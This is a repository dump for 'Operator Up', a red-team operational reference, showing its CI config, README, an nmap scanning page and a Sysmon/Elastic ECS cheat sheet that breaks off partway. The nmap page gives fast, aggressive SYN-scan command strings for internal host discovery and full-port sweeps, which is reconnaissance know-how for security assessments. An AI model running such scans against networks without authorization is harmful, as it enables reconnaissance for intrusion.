├── .github └── workflows │ └── ci.yml ├── .gitignore ├── LICENSE ├── README.md ├── docs ├── building.md ├── contributing.md ├── img │ ├── facebook_cover_photo_1.png │ ├── facebook_cover_photo_2.png │ ├── facebook_profile_image.png │ ├── favicon.png │ ├── instagram_profile_image.png │ ├── linkedin_banner_image_1.png │ ├── linkedin_banner_image_2.png │ ├── linkedin_profile_image.png │ ├── logo.png │ ├── logo_transparent.png │ ├── logo_transparent_crop.jpg │ ├── pinterest_board_photo.png │ ├── pinterest_profile_image.png │ ├── twitter_header_photo_1.png │ ├── twitter_header_photo_2.png │ ├── twitter_profile_image.png │ └── youtube_profile_image.png ├── index.md ├── license.md ├── osint │ └── email.md ├── scanning │ └── nmap.md ├── soc │ └── sysmon │ │ └── sysmon.md ├── stylesheets │ └── extra.css ├── web_app │ └── sql_injections.md └── windows │ ├── collection_operations.md │ ├── lat_movement.md │ ├── local_sa_cmds.md │ ├── network_sa_cmds.md │ ├── persistence.md │ ├── priv_esc.md │ ├── remote_alteration.md │ └── remote_sa_cmds.md ├── mkdocs.yml ├── poetry.lock └── pyproject.toml /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | name: ci 2 | on: 3 | - push 4 | - pull_request 5 | 6 | # Jobs to run 7 | jobs: 8 | 9 | # Deploy docs to github 10 | deploy: 11 | if: github.event_name != 'pull_request' && github.ref == 'refs/heads/master' 12 | runs-on: ubuntu-latest 13 | steps: 14 | 15 | # Checkout source form GitHub 16 | - uses: actions/checkout@v2 17 | 18 | # Install Python runtime and dependencies 19 | - uses: actions/setup-python@v1 20 | with: 21 | python-version: 3.7 22 | 23 | - name: Install poetry 24 | shell: bash 25 | run: | 26 | curl -fsS -o get-poetry.py https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py 27 | python get-poetry.py --preview -y 28 | echo "::set-env name=PATH::$HOME/.poetry/bin:$PATH" 29 | 30 | - name: Configure poetry 31 | shell: bash 32 | run: poetry config virtualenvs.in-project true 33 | 34 | - name: Set up cache 35 | uses: actions/cache@v1 36 | id: cache 37 | with: 38 | path: .venv 39 | key: venv-${{ runner.os }}-${{ steps.full-python-version.outputs.version }}-${{ hashFiles('**/poetry.lock') }} 40 | 41 | - name: Ensure cache is healthy 42 | if: steps.cache.outputs.cache-hit == 'true' 43 | shell: bash 44 | run: poetry run pip --version >/dev/null 2>&1 || rm -rf .venv 45 | 46 | - name: Install dependencies 47 | shell: bash 48 | run: poetry install 49 | 50 | # Set configuration for repository and deploy documentation 51 | - env: 52 | GH_TOKEN: ${{ secrets.GH_TOKEN }} 53 | GH_NAME: ${{ secrets.GH_NAME }} 54 | GH_EMAIL: ${{ secrets.GH_EMAIL }} 55 | run: | 56 | REMOTE="https://${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}" 57 | git config --global user.name "${GH_NAME}" 58 | git config --global user.email "${GH_EMAIL}" 59 | git remote set-url origin ${REMOTE} 60 | 61 | - run: | 62 | poetry run mkdocs gh-deploy --force 63 | poetry run mkdocs --version -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Obscurity Labs 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![image](docs/img/facebook_cover_photo_2.png#center) 2 | 3 |

4 | Your one stop resource for operational hints. 5 |

6 | 7 | 8 | ## What is this project? 9 | 10 | 11 | This project aims to provide a single source of common operational hints seen on **Web/Application**, **Network**, and **Red Team** assessments. While this project is scalable, it may not cover every single scenario applicable to your needs, thats why we need feedback. 12 | 13 | > *Please understand that this is **Open Source** project that is driven by **community** feedback. If you do not contribute, who will? Please take the time to correct, update, or even make a pull request when you are feeling up to the task.* 14 | 15 | ## Status of Operator Up 16 | 17 | This project is purely dirven by operators and commands of operators on live OPs. that being said it does have some basic development efforts to maintain it and ensure content is accurate. 18 | 19 | | Branch | Status | 20 | | :----: | :----: | 21 | | Master | ![Deployment CI](https://github.com/obscuritylabs/operator-up/workflows/ci/badge.svg?branch=master) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) [![HitCount](http://hits.dwyl.com/obscuritylabs/operator-up.svg)](http://hits.dwyl.com/obscuritylabs/operator-up) [![Join the chat at https://gitter.im/obscuritylabs/operator-up](https://badges.gitter.im/obscuritylabs/operator-up.svg)](https://gitter.im/obscuritylabs/operator-up?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) | 22 | 23 | ## Table of Contents 24 | 25 | ### Windows 26 | 27 | - [Windows Privilege Escalation Commands](windows/priv_esc/) 28 | - [Windows Situational Awareness Commands](windows/local_sa_cmds/) 29 | - [Windows Remote Situational Awareness Commands](windows/remote_sa_cmds/) 30 | - [Windows Network Situational Awareness Commands](windows/network_sa_cmds/) 31 | - [Windows Lateral Movement](windows/lat_movement/) 32 | - [Windows Persistence](windows/persistence/) 33 | 34 | ### Scanning 35 | 36 | - [NMAP Scanning Techniques](scanning/nmap/) 37 | 38 | ### Web Application 39 | 40 | - [SQL Injections](web_app/sql_injections/) 41 | -------------------------------------------------------------------------------- /docs/building.md: -------------------------------------------------------------------------------- 1 | # Building Operator Up Docs 2 | 3 | ## Setup Development Environment 4 | 5 | First make sure you have poetry installed, then initialize your virtual environment with the following commands: 6 | 7 | Install the requirements: 8 | ```bash 9 | poetry install 10 | ``` 11 | 12 | Start the venv shell: 13 | ```bash 14 | poetry shell 15 | ``` 16 | 17 | ## Start The Local Development Server 18 | you can start adding and hacking away on the documenting with live reload. 19 | We use this to ensure all documentation nicely fits on the page and any content added will be seamless for users. 20 | 21 | ```bash 22 | mkdocs serve 23 | ``` -------------------------------------------------------------------------------- /docs/contributing.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | Interested in contributing to Operator Up? Want to report a issue? Before you do, please read the following guidelines. 4 | 5 | ## Submission context 6 | ### Got a question or problem? 7 | For quick questions there's no need to open an issue as you can reach us on gitter.im. 8 | 9 | ### Need to make a correction to the content? 10 | If you found a bug within the docs, you can help us by submitting an issue to the issue tracker in our GitHub repository. Even better, you can submit a Pull Request with a fix. However, before doing so, please read the submission guidelines. 11 | 12 | ### Missing a TTP, Section, Tool Cheat sheet? 13 | You can request a new feature by submitting an issue to our GitHub Repository. If you would like to implement a new section, please submit an issue with a proposal for your work first, to be sure that it is of use for everyone. Please consider what kind of change it is: 14 | 15 | * For a major section, first open an issue and outline your proposal so that it can be discussed. This will also allow us to better coordinate our efforts, prevent duplication of work, and help you to craft the change so that it is successfully accepted into the project. 16 | * Small tool additions, cheet sheets and TTPs can be crafted and directly submitted as a Pull Request. However, there is no guarantee that your PR will make it into the master, as it's always a matter of opinion whether if benefits the overall project. 17 | 18 | ## Submission guidelines 19 | ### Submitting an issue 20 | Before you submit an issue, please search the issue tracker, maybe an issue for your problem already exists and the discussion might inform you of workarounds readily available. 21 | 22 | We want to fix all the issues as soon as possible, but before fixing a bug we need to reproduce and confirm it. In order to reproduce bugs we will systematically ask you to provide a minimal reproduction scenario using the custom issue template. Please stick to the issue template. 23 | 24 | ### Submitting a Pull Request (PR) 25 | Search GitHub for an open or closed PR that relates to your submission. You don't want to duplicate effort. If you do not find a related issue or PR, go ahead. 26 | 27 | 1. **Development**: Fork the project, set up the development environment, make your changes in a separate git branch and add descriptive messages to your commits. 28 | 29 | 2. **Build**: Before submitting a pull requests, build the docs using `mkdocs`. This is a mandatory requirement for your PR to get accepted, as all docs must be compiled and pass our CI before we accept it. 30 | 31 | 3. **Pull Request**: After building the docs, commit the compiled output, push your branch to GitHub and send a PR to the `master` branch. If we suggest changes, make the required updates, rebase your branch and push the changes to your GitHub repository, which will automatically update your PR. 32 | 33 | After your PR is merged, you can safely delete your branch and pull the changes from the main (upstream) repository. 34 | 35 | ## Acknowledgments 36 | This page is based off: https://squidfunk.github.io/mkdocs-material/contributing/ as they have a great submission criteria setup. -------------------------------------------------------------------------------- /docs/img/facebook_cover_photo_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/facebook_cover_photo_1.png -------------------------------------------------------------------------------- /docs/img/facebook_cover_photo_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/facebook_cover_photo_2.png -------------------------------------------------------------------------------- /docs/img/facebook_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/facebook_profile_image.png -------------------------------------------------------------------------------- /docs/img/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/favicon.png -------------------------------------------------------------------------------- /docs/img/instagram_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/instagram_profile_image.png -------------------------------------------------------------------------------- /docs/img/linkedin_banner_image_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/linkedin_banner_image_1.png -------------------------------------------------------------------------------- /docs/img/linkedin_banner_image_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/linkedin_banner_image_2.png -------------------------------------------------------------------------------- /docs/img/linkedin_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/linkedin_profile_image.png -------------------------------------------------------------------------------- /docs/img/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/logo.png -------------------------------------------------------------------------------- /docs/img/logo_transparent.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/logo_transparent.png -------------------------------------------------------------------------------- /docs/img/logo_transparent_crop.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/logo_transparent_crop.jpg -------------------------------------------------------------------------------- /docs/img/pinterest_board_photo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/pinterest_board_photo.png -------------------------------------------------------------------------------- /docs/img/pinterest_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/pinterest_profile_image.png -------------------------------------------------------------------------------- /docs/img/twitter_header_photo_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/twitter_header_photo_1.png -------------------------------------------------------------------------------- /docs/img/twitter_header_photo_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/twitter_header_photo_2.png -------------------------------------------------------------------------------- /docs/img/twitter_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/twitter_profile_image.png -------------------------------------------------------------------------------- /docs/img/youtube_profile_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/operator-up/c86a80cfcfd90bf3345137c4a278234d368afe8a/docs/img/youtube_profile_image.png -------------------------------------------------------------------------------- /docs/index.md: -------------------------------------------------------------------------------- 1 | ![image](img/facebook_cover_photo_2.png#center) 2 | 3 |

4 | Your one stop resource for operational hints. 5 |

6 | 7 | 8 | ## What is this project? 9 | 10 | 11 | This project aims to provide a single source of common operational hints seen on **Web/Application**, **Network**, and **Red Team** assessments. While this project is scalable, it may not cover every single scenario applicable to your needs, thats why we need feedback. 12 | 13 | > *Please understand that this is **Open Source** project that is driven by **community** feedback. If you do not contribute, who will? Please take the time to correct, update, or even make a pull request when you are feeling up to the task.* 14 | 15 | ## Status of Operator Up 16 | 17 | This project is purely dirven by operators and commands of operators on live OPs. that being said it does have some basic development efforts to maintain it and ensure content is accurate. 18 | 19 | | Branch | Status | 20 | | :----: | :----: | 21 | | Master | ![Deployment CI](https://github.com/obscuritylabs/operator-up/workflows/ci/badge.svg?branch=master) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) [![HitCount](http://hits.dwyl.com/obscuritylabs/operator-up.svg)](http://hits.dwyl.com/obscuritylabs/operator-up) [![Join the chat at https://gitter.im/obscuritylabs/operator-up](https://badges.gitter.im/obscuritylabs/operator-up.svg)](https://gitter.im/obscuritylabs/operator-up?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) | 22 | 23 | ## Table of Contents 24 | 25 | ### Windows 26 | 27 | - [Windows Privilege Escalation Commands](windows/priv_esc/) 28 | - [Windows Situational Awareness Commands](windows/local_sa_cmds/) 29 | - [Windows Remote Situational Awareness Commands](windows/remote_sa_cmds/) 30 | - [Windows Network Situational Awareness Commands](windows/network_sa_cmds/) 31 | - [Windows Lateral Movement](windows/lat_movement/) 32 | - [Windows Remote Alteration ](windows/remote_alteration/) 33 | - [Windows Persistence](windows/persistence/) 34 | - [Windows Collection Operations](windows/collection_operations/) 35 | 36 | ### Scanning 37 | 38 | - [NMAP Scanning Techniques](scanning/nmap/) 39 | 40 | ### Web Application 41 | 42 | - [SQL Injections](web_app/sql_injections/) 43 | -------------------------------------------------------------------------------- /docs/license.md: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Obscurity Labs 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAM -------------------------------------------------------------------------------- /docs/osint/email.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /docs/scanning/nmap.md: -------------------------------------------------------------------------------- 1 | # NMAP Scanning Techniques 2 | 3 | ## Internal Host Discovery 4 | 5 | !!! tip 6 | A few small tips about the following nmap scanning string: 7 | 8 | * 255 min host group is recommended. 9 | * min rate 6000 is recommended to keep kernel pumping packets. 10 | 11 | ```bash 12 | nmap -Pn -n -sS -vvv -p 21-23,25,53,111,137,139,445,80,443,8443,8080 \ 13 | --min-hostgroup 255 \ 14 | --min-rtt-timeout 0ms \ 15 | --max-rtt-timeout 100ms \ 16 | --max-retries 1 \ 17 | --max-scan-delay 0 \ 18 | --min-rate 6000 \ 19 | --open \ 20 | -oA CLIENT-# \ 21 | -iL 22 | ``` 23 | 24 | ## Internal Full Scope Hit and Run String using Syn Half Scan 25 | 26 | !!! tip 27 | A few small tips about the following nmap scanning string: 28 | 29 | * 255 min host group is recommended. 30 | * min rate 1000 should be fine for internal scanning with decent accuracy of results. 31 | * Full Port Scan / --open is used for further parsing. 32 | 33 | ```bash 34 | nmap -Pn -n -sS -p- -sV -vvv --min-hostgroup 255 \ 35 | --min-rtt-timeout 25ms \ 36 | --max-rtt-timeout 100ms \ 37 | --max-retries 1 \ 38 | --max-scan-delay 0 \ 39 | --min-rate 1000 \ 40 | --open \ 41 | -oA \ 42 | -iL 43 | ``` -------------------------------------------------------------------------------- /docs/soc/sysmon/sysmon.md: -------------------------------------------------------------------------------- 1 | # Sysmon 2 | 3 | ## Sysmon cheat sheet 4 | 5 | | ID | Name | Tag | 6 | | --- | -------------------- | ------------------------------------------------ | 7 | | 1 | ProcessCreate | Process Create | 8 | | 2 | FileCreateTime | File creation time | 9 | | 3 | NetworkConnect | Network connection detected | 10 | | 4 | N/A | Sysmon service state change (cannot be filtered) | 11 | | 5 | ProcessTerminate | Process terminated | 12 | | 6 | DriverLoad | Driver Loaded | 13 | | 7 | ImageLoad | Image loaded | 14 | | 8 | CreateRemoteThread | CreateRemoteThread detected | 15 | | 9 | RawAccessRead | RawAccessRead detected | 16 | | 10 | ProcessAccess | Process accessed | 17 | | 11 | FileCreate | File created | 18 | | 12 | RegistryEvent | Registry object added or deleted | 19 | | 13 | RegistryEvent | Registry value set | 20 | | 14 | RegistryEvent | Registry object renamed | 21 | | 15 | FileCreateStreamHash | File stream created | 22 | | 16 | n/a | Sysmon configuration change (cannot be filtered) | 23 | | 17 | PipeEvent | Named pipe created | 24 | | 18 | PipeEvent | Named pipe connected | 25 | | 19 | WmiEvent | WMI filter | 26 | | 20 | WmiEvent | WMI consumer | 27 | | 21 | WmiEvent | WMI consumer filter | 28 | | 22 | DNSQuery | DNS query | 29 | | 23 | FileDelete | File Delete archived | 30 | | 24 | ClipboardChange | New content in the clipboard | 31 | | 25 | ProcessTampering | Process image change | 32 | | 26 | FileDeleteDetected | File Delete logged | 33 | 34 | ## Sysmon Elastic ECS cheat sheet 35 | 36 | ### EventID 1 Process Create 37 | 38 | The process creation event provides extended information about a newly created process. The full command line provides context on the process execution. The ProcessGUID field is a unique value for this process across a domain to make event correlation easier. The hash is a full hash of the file with the algorithms in the HashType field. 39 | 40 | #### Event Log Entry 41 | 42 | | Field | Detail | 43 | | ----------------- | --------------------------------------------------------------------------------------------------------------------------------------------- | 44 | | UtcTime | Time in UTC when event was created | 45 | | ProcessGuid | Process Guid of the process that got spawned/created (child) | 46 | | ProcessId | Process ID used by the OS to identify the created process (child) | 47 | | Image | File path of the process being spawned/created. Considered also the child or source process | 48 | | FileVersion | Version of the image associated with the main process (child) | 49 | | Description | Description of the image associated with the main process (child) | 50 | | Product | Product name the image associated with the main process (child) belongs to | 51 | | OriginalFileName | OriginalFileName from the PE header, added on compilation | 52 | | Company | Company name the image associated with the main process (child) belongs to | 53 | | CommandLine | Arguments which were passed to the executable associated with the main process | 54 | | CurrentDirectory | The path without the name of the image associated with the process | 55 | | User | Name of the account that created the process (child) . It usually contains domain name and username | 56 | | LogonGuid | Logon GUID of the user who created the new process. Value that can help you correlate this event with others that contain the same Logon GUID | 57 | | LogonId | Login ID of the user who created the new process. Value that can help you correlate this event with others that contain the same Logon ID | 58 | | TerminalSessionId | ID of the session the user belongs to | 59 | | IntegrityLevel | Integrity label assigned to a process | 60 | | Hashes | Full hash of the file with the algorithms in the HashType field | 61 | | ParentProcessGuid | ProcessGUID of the process that spawned/created the main process (child) | 62 | | ParentProcessId | Process ID of the process that spawned/created the main process (child) | 63 | | ParentImage | File path that spawned/created the main process | 64 | | ParentCommandLine | Arguments which were passed to the executable associated with the parent process | 65 | | ParentUser | Name of the account that created the parent process. It usually contains domain name and username | 66 | 67 | #### Elastic ECS Mapping 68 | 69 | ```text 70 | Process Create: 71 | RuleName: technique_id=T1218.002,technique_name=rundll32.exe 72 | UtcTime: 2022-01-29 05:33:08.667 73 | ProcessGuid: {a7262f76-d194-61f4-c000-000000000900} 74 | ProcessId: 1168 75 | Image: C:\Windows\System32\rundll32.exe 76 | FileVersion: 10.0.19041.746 (WinBuild.160101.0800) 77 | Description: Windows host process (Rundll32) 78 | Product: Microsoft® Windows® Operating System 79 | Company: Microsoft Corporation 80 | OriginalFileName: RUNDLL32.EXE 81 | CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask 82 | CurrentDirectory: C:\Windows\system32\ 83 | User: NT AUTHORITY\SYSTEM 84 | LogonGuid: {a7262f76-d0ce-61f4-e703-000000000000} 85 | LogonId: 0x3E7 86 | TerminalSessionId: 0 87 | IntegrityLevel: System 88 | Hashes: SHA1=DD399AE46303343F9F0DA189AEE11C67BD868222,MD5=EF3179D498793BF4234F708D3BE28633,SHA256=B53F3C0CD32D7F20849850768DA6431E5F876B7BFA61DB0AA0700B02873393FA,IMPHASH=4DB27267734D1576D75C991DC70F68AC 89 | ParentProcessGuid: {a7262f76-d0d6-61f4-2d00-000000000900} 90 | ParentProcessId: 1956 91 | ParentImage: C:\Windows\System32\svchost.exe 92 | ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule 93 | ParentUser: NT AUTHORITY\SYSTEM 94 | ``` 95 | 96 | | ECS Event Mapping | Field Data (Example) | Sysmon Field Mapping | 97 | |----|----|----| 98 | | event.action | N/A | 99 | | event.category | process | | 100 | | event.code | 1 | | 101 | | event.created | Jan 30, 2022 @ 21:51:17.092 | UtcTime | 102 | | event.kind | event | N/A | 103 | | event.module | sysmon | N/A | 104 | | event.provider | Microsoft-Windows-Sysmon | N/A | 105 | | event.type | start, process_start | n/a | 106 | | hash.imphash | b71cb3ac5c352bec857c940cbc95f0f3 | Hashes | 107 | | hash.md5 | 60ff40cfd7fb8fe41ee4fe9ae5fe1c51 | Hashes | 108 | | hash.sha1 | 3ea7cc066317ac45f963c2227c4c7c50aa16eb7c | Hashes | 109 | | hash.sha256 | 2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3 | Hashes | 110 | | process.args | C:\Windows\system32\rundll32.exe, C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask | CommandLine | 111 | | process.command_line | C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask | CommandLine | 112 | | process.entity_id | {a754cc8d-0794-61f8-d001-000000000d00} | ProcessGuid | 113 | | process.executable | C:\Windows\System32\rundll32.exe | Image | 114 | | process.parent.args | C:\Windows\system32\svchost.exe, -k, netsvcs, -p, -s, Schedule | ParentCommandLine | 115 | | process.parent.command_line | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | ParentCommandLine | 116 | | process.parent.entity_id | {a754cc8d-d9d1-61f7-2600-000000000d00} | ParentProcessGuid 117 | | process.parent.name | svchost.exe | ParentImage | 118 | | process.parent.pid | 1632 | ParentProcessId | 119 | | process.pe.company | Microsoft Corporation | Company | 120 | | process.pe.description | Windows host process (Rundll32) | Description | 121 | | process.pe.product | Microsoft® Windows® Operating System | Product | 122 | | process.pid | 5316 | ProcessId | 123 | | process.working_directory | C:\Windows\system32\ | CurrentDirectory | 124 | | related.hash | dd399ae46303343f9f0da189aee11c67bd868222, ef3179d498793bf4234f708d3be28633, b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa, 4db27267734d1576d75c991dc70f68ac | Hashes | 125 | | related.user | SYSTEM | User | 126 | | user.domain | NT AUTHORITY | User | 127 | | user.id | S-1-5-18 | LogonId | 128 | | user.name | SYSTEM | User | 129 | 130 | ### EventID 2 File creation time changed 131 | 132 | The change file creation time event is registered when a file creation time is explicitly modified by a process. This event helps tracking the real creation time of a file. Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity. 133 | 134 | #### Event Log Entry 135 | 136 | | Field | Detail | 137 | | ----------------------- | --------------------------------------------------------------------------------------- | 138 | | UtcTime | Time in UTC when event was created | 139 | | ProcessGuid | Process Guid of the process that changed the file creation time | 140 | | ProcessId | Process ID used by the OS to identify the process changing the file creation time | 141 | | Image File | path of the process that changed the file creation time | 142 | | TargetFilename | Full path name of the file | 143 | | CreationUtcTime | New creation time of the file | 144 | | PreviousCreationUtcTime | Previous creation time of the file | 145 | | User | Name of the account that created the file. It usually contains domain name and username | 146 | 147 | #### Elastic ECS Mapping 148 | 149 | | ECS Event Mapping | Field Data (Example) | Sysmon Field Mapping | 150 | |----|----|----| 151 | 152 | ### EventID 3 Network connection 153 | 154 | The network connection event logs TCP/UDP connections on the machine. It is disabled by default. Each connection is linked to a process through the ProcessId and ProcessGUID fields. The event also contains the source and destination host names IP addresses, port numbers and IPv6 status. 155 | 156 | #### Event Log Entry 157 | 158 